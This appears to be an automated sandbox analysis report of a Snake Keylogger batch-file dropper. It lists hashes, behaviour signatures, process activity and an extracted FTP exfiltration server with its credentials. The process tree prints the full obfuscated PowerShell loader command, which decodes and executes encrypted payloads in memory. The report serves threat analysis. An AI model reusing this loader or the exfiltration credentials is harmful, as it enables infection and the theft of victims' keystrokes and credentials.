Analysis

  • max time kernel
    104s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/03/2025, 17:13

General

  • Target

    NewOrder.bat

  • Size

    222KB

  • MD5

    e5283abf739e36fd9e77c617b0028567

  • SHA1

    0e55afb7134c54baf775a3f8dbfcd7936361ce1a

  • SHA256

    de2b16c406a932ab788f74900bdad5b00f926126d98437f151e740905ec2bece

  • SHA512

    813847b4f269997371ef2655ee4aa6cd863b5575d9a05c50a3f1d4f86e9c077a01fa2789de8b3c1acb99866be5185768068743f341bb64f0ad25b6281a68f883

  • SSDEEP

    3072:0AeVwHyo+aD5NE7ZLgUzN4b9H2mncpe1jg7RmtQ/n0HfZ2Z1wJ6GghPs:W3aD5NEiUx4Tncpe5HfQwJSS

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    50.31.176.103
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    HW=f09RQ-BL1

Extracted

Family

snakekeylogger

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://50.31.176.103/
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    HW=f09RQ-BL1

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 1 IoCs
  • Snakekeylogger family
  • Blocklisted process makes network request 4 IoCs
  • Drops startup file 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NewOrder.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3176
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\NewOrder.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2968
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2VycGV5dndOYW1lIHBleXZ3PSAkZW5wZXl2d3Y6VVNFcGV5dndSTkFNRXBleXZ3OyR4b21wZXl2d2F2ID0gcGV5dnciQzpcVXBleXZ3c2Vyc1xwZXl2dyR1c2VycGV5dndOYW1lXHBleXZ3ZHdtLmJwZXl2d2F0IjtpcGV5dndmIChUZXBleXZ3c3QtUGFwZXl2d3RoICR4cGV5dndvbWF2KXBleXZ3IHsgICBwZXl2dyBXcml0cGV5dndlLUhvc3BleXZ3dCAiQmFwZXl2d3RjaCBmcGV5dndpbGUgZnBleXZ3b3VuZDpwZXl2dyAkeG9tcGV5dndhdiIgLXBleXZ3Rm9yZWdwZXl2d3JvdW5kcGV5dndDb2xvcnBleXZ3IEN5YW5wZXl2dzsgICAgcGV5dnckZmlsZXBleXZ3TGluZXNwZXl2dyA9IFtTcGV5dnd5c3RlbXBleXZ3LklPLkZwZXl2d2lsZV06cGV5dnc6UmVhZHBleXZ3QWxsTGlwZXl2d25lcygkcGV5dnd4b21hdnBleXZ3LCBbU3lwZXl2d3N0ZW0ucGV5dndUZXh0LnBleXZ3RW5jb2RwZXl2d2luZ106cGV5dnc6VVRGOHBleXZ3KTsgICBwZXl2dyBmb3JlcGV5dndhY2ggKHBleXZ3JGxpbmVwZXl2dyBpbiAkcGV5dndmaWxlTHBleXZ3aW5lcylwZXl2dyB7ICAgcGV5dncgICAgIHBleXZ3aWYgKCRwZXl2d2xpbmUgcGV5dnctbWF0Y3BleXZ3aCAnXjpwZXl2dzo6ID8ocGV5dncuKykkJ3BleXZ3KSB7ICBwZXl2dyAgICAgcGV5dncgICAgIHBleXZ3V3JpdGVwZXl2dy1Ib3N0cGV5dncgIkluanBleXZ3ZWN0aW9wZXl2d24gY29kcGV5dndlIGRldHBleXZ3ZWN0ZWRwZXl2dyBpbiB0cGV5dndoZSBiYXBleXZ3dGNoIGZwZXl2d2lsZS4icGV5dncgLUZvcnBleXZ3ZWdyb3VwZXl2d25kQ29scGV5dndvciBDeXBleXZ3YW47ICBwZXl2dyAgICAgcGV5dncgICAgIHBleXZ3dHJ5IHtwZXl2dyAgICAgcGV5dncgICAgIHBleXZ3ICAgICBwZXl2dyAkZGVjcGV5dndvZGVkQnBleXZ3eXRlcyBwZXl2dz0gW1N5cGV5dndzdGVtLnBleXZ3Q29udmVwZXl2d3J0XTo6cGV5dndGcm9tQnBleXZ3YXNlNjRwZXl2d1N0cmlucGV5dndnKCRtYXBleXZ3dGNoZXNwZXl2d1sxXS5UcGV5dndyaW0oKXBleXZ3KTsgICBwZXl2dyAgICAgcGV5dncgICAgIHBleXZ3ICAgJGlwZXl2d25qZWN0cGV5dndpb25Db3BleXZ3ZGUgPSBwZXl2d1tTeXN0cGV5dndlbS5UZXBleXZ3eHQuRW5wZXl2d2NvZGlucGV5dndnXTo6VXBleXZ3bmljb2RwZXl2d2UuR2V0cGV5dndTdHJpbnBleXZ3ZygkZGVwZXl2d2NvZGVkcGV5dndCeXRlc3BleXZ3KTsgICBwZXl2dyAgICAgcGV5dncgICAgIHBleXZ3ICAgV3JwZXl2d2l0ZS1IcGV5dndvc3QgInBleXZ3SW5qZWNwZXl2d3Rpb24gcGV5dndjb2RlIHBleXZ3ZGVjb2RwZXl2d2VkIHN1cGV5dndjY2Vzc3BleXZ3ZnVsbHlwZXl2dy4iIC1GcGV5dndvcmVncnBleXZ3b3VuZENwZXl2d29sb3IgcGV5dndHcmVlbnBleXZ3OyAgICBwZXl2dyAgICAgcGV5dncgICAgIHBleXZ3ICBXcmlwZXl2d3RlLUhvcGV5dndzdCAiRXBleXZ3eGVjdXRwZXl2d2luZyBpcGV5dnduamVjdHBleXZ3aW9uIGNwZXl2d29kZS4ucGV5dncuIiAtRnBleXZ3b3JlZ3JwZXl2d291bmRDcGV5dndvbG9yIHBleXZ3WWVsbG9wZXl2d3c7ICAgcGV5dncgICAgIHBleXZ3ICAgICBwZXl2dyAgIElucGV5dnd2b2tlLXBleXZ3RXhwcmVwZXl2d3NzaW9ucGV5dncgJGluanBleXZ3ZWN0aW9wZXl2d25Db2RlcGV5dnc7ICAgIHBleXZ3ICAgICBwZXl2dyAgICAgcGV5dncgIGJyZXBleXZ3YWs7ICBwZXl2dyAgICAgcGV5dncgICAgIHBleXZ3fSBjYXRwZXl2d2NoIHsgcGV5dncgICAgIHBleXZ3ICAgICBwZXl2dyAgICAgcGV5dndXcml0ZXBleXZ3LUhvc3RwZXl2dyAiRXJycGV5dndvciBkdXBleXZ3cmluZyBwZXl2d2RlY29kcGV5dndpbmcgb3BleXZ3ciBleGVwZXl2d2N1dGlucGV5dndnIGluanBleXZ3ZWN0aW9wZXl2d24gY29kcGV5dndlOiAkX3BleXZ3IiAtRm9wZXl2d3JlZ3JvcGV5dnd1bmRDb3BleXZ3bG9yIFJwZXl2d2VkOyAgcGV5dncgICAgIHBleXZ3ICAgICBwZXl2d307ICAgcGV5dncgICAgIHBleXZ3fTsgICBwZXl2dyB9O30gcGV5dndlbHNlIHBleXZ3eyAgICBwZXl2dyAgV3JpcGV5dnd0ZS1Ib3BleXZ3c3QgIlNwZXl2d3lzdGVtcGV5dncgRXJyb3BleXZ3cjogQmFwZXl2d3RjaCBmcGV5dndpbGUgbnBleXZ3b3QgZm9wZXl2d3VuZDogcGV5dnckeG9tYXBleXZ3diIgLUZwZXl2d29yZWdycGV5dndvdW5kQ3BleXZ3b2xvciBwZXl2d1JlZDsgcGV5dncgICBleHBleXZ3aXQ7fTtwZXl2d2Z1bmN0cGV5dndpb24gd3BleXZ3cmhmcChwZXl2dyRwYXJhcGV5dndtX3ZhcnBleXZ3KXsJJGFwZXl2d2VzX3ZhcGV5dndyPVtTeXBleXZ3c3RlbS5wZXl2d1NlY3VycGV5dndpdHkuQ3BleXZ3cnlwdG9wZXl2d2dyYXBocGV5dnd5LkFlc3BleXZ3XTo6Q3JwZXl2d2VhdGUocGV5dncpOwkkYXBleXZ3ZXNfdmFwZXl2d3IuTW9kcGV5dndlPVtTeXBleXZ3c3RlbS5wZXl2d1NlY3VycGV5dndpdHkuQ3BleXZ3cnlwdG9wZXl2d2dyYXBocGV5dnd5LkNpcHBleXZ3aGVyTW9wZXl2d2RlXTo6cGV5dndDQkM7CXBleXZ3JGFlc19wZXl2d3Zhci5QcGV5dndhZGRpbnBleXZ3Zz1bU3lwZXl2d3N0ZW0ucGV5dndTZWN1cnBleXZ3aXR5LkNwZXl2d3J5cHRvcGV5dndncmFwaHBleXZ3eS5QYWRwZXl2d2RpbmdNcGV5dndvZGVdOnBleXZ3OlBLQ1NwZXl2dzc7CSRhcGV5dndlc192YXBleXZ3ci5LZXlwZXl2dz1bU3lzcGV5dnd0ZW0uQ3BleXZ3b252ZXJwZXl2d3RdOjpGcGV5dndyb21CYXBleXZ3c2U2NFNwZXl2d3RyaW5ncGV5dncoJ3N2K3BleXZ3eC9Wak9wZXl2d1VnMGg1cGV5dndBZzM4TnBleXZ3RldZUUNwZXl2d0FBK0NCcGV5dndIMm5aU3BleXZ3V2VrOVlwZXl2d1F0TlQ4cGV5dnc9Jyk7CXBleXZ3JGFlc19wZXl2d3Zhci5JcGV5dndWPVtTeXBleXZ3c3RlbS5wZXl2d0NvbnZlcGV5dndydF06OnBleXZ3RnJvbUJwZXl2d2FzZTY0cGV5dndTdHJpbnBleXZ3ZygnK2JwZXl2d05xYnRxcGV5dndDOGtBZHBleXZ3Z3g3MFlwZXl2d040d0dBcGV5dnc9PScpO3BleXZ3CSRkZWNwZXl2d3J5cHRvcGV5dndyX3ZhcnBleXZ3PSRhZXNwZXl2d192YXIucGV5dndDcmVhdHBleXZ3ZURlY3JwZXl2d3lwdG9ycGV5dncoKTsJJHBleXZ3cmV0dXJwZXl2d25fdmFycGV5dnc9JGRlY3BleXZ3cnlwdG9wZXl2d3JfdmFycGV5dncuVHJhbnBleXZ3c2Zvcm1wZXl2d0ZpbmFscGV5dndCbG9ja3BleXZ3KCRwYXJwZXl2d2FtX3ZhcGV5dndyLCAwLHBleXZ3ICRwYXJwZXl2d2FtX3ZhcGV5dndyLkxlbnBleXZ3Z3RoKTtwZXl2dwkkZGVjcGV5dndyeXB0b3BleXZ3cl92YXJwZXl2dy5EaXNwcGV5dndvc2UoKXBleXZ3OwkkYWVwZXl2d3NfdmFycGV5dncuRGlzcHBleXZ3b3NlKClwZXl2dzsJJHJlcGV5dnd0dXJuX3BleXZ3dmFyO31wZXl2d2Z1bmN0cGV5dndpb24geHBleXZ3enZ0eChwZXl2dyRwYXJhcGV5dndtX3ZhcnBleXZ3KXsJJGhwZXl2d3BtY2E9cGV5dndOZXctT3BleXZ3YmplY3RwZXl2dyBTeXN0cGV5dndlbS5JT3BleXZ3Lk1lbW9wZXl2d3J5U3RycGV5dndlYW0oLHBleXZ3JHBhcmFwZXl2d21fdmFycGV5dncpOwkkenBleXZ3d2NxbD1wZXl2d05ldy1PcGV5dndiamVjdHBleXZ3IFN5c3RwZXl2d2VtLklPcGV5dncuTWVtb3BleXZ3cnlTdHJwZXl2d2VhbTsJcGV5dnckYnh1enBleXZ3eD1OZXdwZXl2dy1PYmplcGV5dndjdCBTeXBleXZ3c3RlbS5wZXl2d0lPLkNvcGV5dndtcHJlc3BleXZ3c2lvbi5wZXl2d0daaXBTcGV5dnd0cmVhbXBleXZ3KCRocG1wZXl2d2NhLCBbcGV5dndJTy5Db3BleXZ3bXByZXNwZXl2d3Npb24ucGV5dndDb21wcnBleXZ3ZXNzaW9wZXl2d25Nb2RlcGV5dnddOjpEZXBleXZ3Y29tcHJwZXl2d2Vzcyk7cGV5dncJJGJ4dXBleXZ3enguQ29wZXl2d3B5VG8ocGV5dnckendjcXBleXZ3bCk7CSRwZXl2d2J4dXp4cGV5dncuRGlzcHBleXZ3b3NlKClwZXl2dzsJJGhwcGV5dndtY2EuRHBleXZ3aXNwb3NwZXl2d2UoKTsJcGV5dnckendjcXBleXZ3bC5EaXNwZXl2d3Bvc2UocGV5dncpOwkkenBleXZ3d2NxbC5wZXl2d1RvQXJycGV5dndheSgpO3BleXZ3fWZ1bmNwZXl2d3Rpb24gcGV5dndhd2piYnBleXZ3KCRwYXJwZXl2d2FtX3ZhcGV5dndyLCRwYXBleXZ3cmFtMl9wZXl2d3Zhcil7cGV5dncJJGhoa3BleXZ3bnU9W1NwZXl2d3lzdGVtcGV5dncuUmVmbHBleXZ3ZWN0aW9wZXl2d24uQXNzcGV5dndlbWJseXBleXZ3XTo6KCdwZXl2d2Rhb0wncGV5dndbLTEuLnBleXZ3LTRdIC1wZXl2d2pvaW4gcGV5dncnJykoW3BleXZ3Ynl0ZVtwZXl2d11dJHBhcGV5dndyYW1fdnBleXZ3YXIpOwlwZXl2dyRzamV4cGV5dndyPSRoaHBleXZ3a251LkVwZXl2d250cnlQcGV5dndvaW50O3BleXZ3CSRzamVwZXl2d3hyLklucGV5dnd2b2tlKHBleXZ3JG51bGxwZXl2dywgJHBhcGV5dndyYW0yX3BleXZ3dmFyKTtwZXl2d30kaG9zcGV5dnd0LlVJLnBleXZ3UmF3VUlwZXl2dy5XaW5kcGV5dndvd1RpdHBleXZ3bGUgPSBwZXl2dyR4b21hcGV5dnd2OyRscXBleXZ3enNvPVtwZXl2d1N5c3RlcGV5dndtLklPLnBleXZ3RmlsZV1wZXl2dzo6KCd0cGV5dnd4ZVRsbHBleXZ3QWRhZVJwZXl2dydbLTEucGV5dncuLTExXXBleXZ3IC1qb2lwZXl2d24gJycpcGV5dncoJHhvbXBleXZ3YXYpLlNwZXl2d3BsaXQocGV5dndbRW52aXBleXZ3cm9ubWVwZXl2d250XTo6cGV5dndOZXdMaXBleXZ3bmUpO2ZwZXl2d29yZWFjcGV5dndoICgkanBleXZ3eXhidSBwZXl2d2luICRscGV5dndxenNvKXBleXZ3IHsJaWZwZXl2dyAoJGp5cGV5dnd4YnUuU3BleXZ3dGFydHNwZXl2d1dpdGgocGV5dncnOjogJ3BleXZ3KSkJewlwZXl2dwkkdWpmcGV5dndoeT0kanBleXZ3eXhidS5wZXl2d1N1YnN0cGV5dndyaW5nKHBleXZ3Myk7CQlwZXl2d2JyZWFrcGV5dnc7CX19JHBleXZ3enRyaXRwZXl2dz1bc3RycGV5dndpbmdbXXBleXZ3XSR1amZwZXl2d2h5LlNwcGV5dndsaXQoJ3BleXZ3XCcpOyRwZXl2d2p0bWxpcGV5dnc9eHp2dHBleXZ3eCAod3JwZXl2d2hmcCAocGV5dndbQ29udnBleXZ3ZXJ0XTpwZXl2dzpGcm9tcGV5dndCYXNlNnBleXZ3NFN0cmlwZXl2d25nKCR6cGV5dnd0cml0W3BleXZ3MF0pKSlwZXl2dzskYmJxcGV5dndtbj14enBleXZ3dnR4IChwZXl2d3dyaGZwcGV5dncgKFtDb3BleXZ3bnZlcnRwZXl2d106OkZycGV5dndvbUJhc3BleXZ3ZTY0U3RwZXl2d3JpbmcocGV5dnckenRyaXBleXZ3dFsxXSlwZXl2dykpO2F3cGV5dndqYmIgJHBleXZ3anRtbGlwZXl2dyAkbnVscGV5dndsO2F3anBleXZ3YmIgJGJwZXl2d2JxbW4gcGV5dncoLFtzdHBleXZ3cmluZ1twZXl2d11dICgncGV5dnclKicpKXBleXZ3Ow0KJ0ANCg0KJGRlb2JmdXNjYXRlZCA9ICRzY3JpcHRDb250ZW50IC1yZXBsYWNlICdwZXl2dycsICcnDQoNCkludm9rZS1FeHByZXNzaW9uICRkZW9iZnVzY2F0ZWQNCg==')) | Invoke-Expression"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Accesses Microsoft Outlook profiles
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:1796

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aqmklfby.h1e.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\dwm.bat

    Filesize

    222KB

    MD5

    e5283abf739e36fd9e77c617b0028567

    SHA1

    0e55afb7134c54baf775a3f8dbfcd7936361ce1a

    SHA256

    de2b16c406a932ab788f74900bdad5b00f926126d98437f151e740905ec2bece

    SHA512

    813847b4f269997371ef2655ee4aa6cd863b5575d9a05c50a3f1d4f86e9c077a01fa2789de8b3c1acb99866be5185768068743f341bb64f0ad25b6281a68f883

  • memory/1796-22-0x0000000006890000-0x00000000068AA000-memory.dmp

    Filesize

    104KB

  • memory/1796-34-0x0000000074FF0000-0x00000000757A0000-memory.dmp

    Filesize

    7.7MB

  • memory/1796-6-0x00000000053B0000-0x00000000053D2000-memory.dmp

    Filesize

    136KB

  • memory/1796-7-0x0000000005A80000-0x0000000005AE6000-memory.dmp

    Filesize

    408KB

  • memory/1796-8-0x0000000005AF0000-0x0000000005B56000-memory.dmp

    Filesize

    408KB

  • memory/1796-5-0x0000000005450000-0x0000000005A78000-memory.dmp

    Filesize

    6.2MB

  • memory/1796-18-0x0000000005C50000-0x0000000005FA4000-memory.dmp

    Filesize

    3.3MB

  • memory/1796-19-0x0000000006160000-0x000000000617E000-memory.dmp

    Filesize

    120KB

  • memory/1796-20-0x0000000006190000-0x00000000061DC000-memory.dmp

    Filesize

    304KB

  • memory/1796-21-0x0000000007AA0000-0x000000000811A000-memory.dmp

    Filesize

    6.5MB

  • memory/1796-2-0x0000000074FFE000-0x0000000074FFF000-memory.dmp

    Filesize

    4KB

  • memory/1796-23-0x0000000007420000-0x00000000074B6000-memory.dmp

    Filesize

    600KB

  • memory/1796-4-0x0000000074FF0000-0x00000000757A0000-memory.dmp

    Filesize

    7.7MB

  • memory/1796-3-0x0000000004D90000-0x0000000004DC6000-memory.dmp

    Filesize

    216KB

  • memory/1796-24-0x0000000007370000-0x0000000007392000-memory.dmp

    Filesize

    136KB

  • memory/1796-27-0x0000000007560000-0x00000000075F2000-memory.dmp

    Filesize

    584KB

  • memory/1796-28-0x0000000007540000-0x0000000007548000-memory.dmp

    Filesize

    32KB

  • memory/1796-29-0x0000000007750000-0x0000000007764000-memory.dmp

    Filesize

    80KB

  • memory/1796-31-0x0000000007780000-0x00000000077A6000-memory.dmp

    Filesize

    152KB

  • memory/1796-32-0x0000000007850000-0x00000000078EC000-memory.dmp

    Filesize

    624KB

  • memory/1796-33-0x0000000074FFE000-0x0000000074FFF000-memory.dmp

    Filesize

    4KB

  • memory/1796-25-0x0000000008120000-0x00000000086C4000-memory.dmp

    Filesize

    5.6MB

  • memory/1796-35-0x00000000079E0000-0x0000000007A30000-memory.dmp

    Filesize

    320KB

  • memory/1796-36-0x00000000088A0000-0x0000000008A62000-memory.dmp

    Filesize

    1.8MB

  • memory/1796-38-0x0000000007A30000-0x0000000007A3A000-memory.dmp

    Filesize

    40KB